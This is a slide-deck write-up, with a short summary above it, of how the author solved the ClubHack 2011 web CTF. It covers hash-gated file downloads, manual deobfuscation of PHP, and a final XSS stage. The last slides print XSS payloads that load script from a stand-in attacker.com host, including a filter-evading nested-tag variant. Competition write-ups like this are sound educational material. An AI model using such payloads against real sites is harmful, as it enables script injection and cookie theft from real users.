This document summarizes how the author won a capture the flag (CTF) competition called ClubHack 2011. It describes the different stages of analyzing the challenges, from gathering information to exploiting a cross-site scripting vulnerability to steal the flag and secure entry to the conference. It highlights the tools and techniques used, such as deobfuscating code, using hashes to download files, and using event handlers and cookies to steal data with XSS.

1. How I won ClubHack 2011 CTF
AMol NAik
http://amolnaik4.blogspot.com

2. Agenda
 Introduction to CTF
 ClubHack 2011 preCON CTF
 Tools
 Execution Stages
 Thanks/Questions

3. Introduction to CTF
 CTF stands for Capture the Flag
 Types:
 Pre-conference
 Educational
 Web based
 Exploitation
 Web + Exploitation
 Teams / Individuals
 Offensive / Defensive

4. ClubHack 2011 preCON CTF
 Free conference entry
 Qualified to play Treasure Hunt @ClubHack
 Physical CTF
 Web Based

5. Tools
 Mozilla Firefox
 Add-on: Tamper Data
 Web Server with PHP
 Brain
 Time
 Patience
 ……..
 ……..

6. Execution
 Register for the event
 Access CTF site
 Gather Information & Analyze
 Look for hidden treasures
 Get the Flag and Submit

7. Stage - 1
 Information Gathering
 Download.html
 Can be used to download files from server
 Two params: filename & some HASH
 How imp the hash is in file download ?
 What type of Hash it is?
 How to generate it?
 UserLogin.html
 Auth Bypass
 Guessable Logins
 What else ???

8. Stage - 1
 Analysis
 Download.html
 Need hash to download file
 Hash is SHA1
 How to generate it?
 UserLogin.html
 No SQLi
 No Auth Bypass
 No Guessable Login
 Brute Force ???

9. Stage - 2
 Deep Inspection
 Found „execute.php‟ in source of download.html 
 Looks like command utility
 OS commanding ???
 Analysis
 No OS command execution
 “Wonly one command”
 Commands which takes „file‟ as parameter ???
 Single Command
 sha1sum

10. Stage - 3
 Something to work on
 Hash generation – execute.php
 File Download – download.php
 Login – UserLogin.php
 Try to download files
 Download.php
 Execute.php
 UserLogin.php
 Analysis
 Only „UserLogin.php‟ is possible to download

11. Stage - 4
 Obfuscated PHP Code
 UserLogin.php is obfuscated
 “Free Online PHP Obfuscator v1.2: http://www.fopo.com.a
r”
 No Online de-obfuscation tool available 
 I was not able to find out one
 Analysis
 Go Manual Mode !!
 Create scripts

12. Stage - 5
 De-Obfuscation
 Replace eval() with echo() -
 Base64_decode()
 Decode $variable names
 Replace $variables -
 ROT13 -> Base64_decode() -> gzinflate()
 Just echo 
-

13. Stage - 5
 Analysis
 Credentials -> „myhashesarenothere.txt‟
 Successful Login -> Final.php
 Next
 Access „myhashesarenothere.txt‟
 Login in UserLogin.php

14. Stage – 6: Final
 Information Gathering
 POST form
 Looks like mail client
 Hard-coded email addresses & Subject
 Message is the only available space for User Input
 Analysis
 Tamper „TO‟ email address & „Subject‟
 Test „Message‟ for SQLi, Code Injection, ….
 What else ???

15. Stage – 6: Final
 Damn…It‟s a ROCK !!!!
 No server-side bug
 Code Injection
 SQLi
 Only XSS
 No <script> & <img>
 May be flag.txt
 May be messages.txt || mail.txt || sec*.txt
 ?????
 ?????

16. Stage – 6: Final
 A Ray of Hope
 Tweet from @ClubHack
 Only “XSS”
 Never seen XSS in CTF
 What to exploit?
 Myself??
 Event Handlers
 document.cookie
 Did they mean “Some Cookie” ?

17. Final
 After 2-days
 Got Flag & Submit link 
 Free entry to ClubHack -> Secured !!
 Payloads Used:
 <ScRiPt src=“http://attacker.com/evil.js”></script>
 me
 <scr<script>ipt src=“http://attacker.com/evil.js”></script>
 Vishal Oza

18. Thanks/Questions
 webDEViL
 CTF Creation and Access for “Live Demo”
 ClubHack
 Organizing CTF challenge
 For Gifts !!!
http://twitter.com/amolnaik4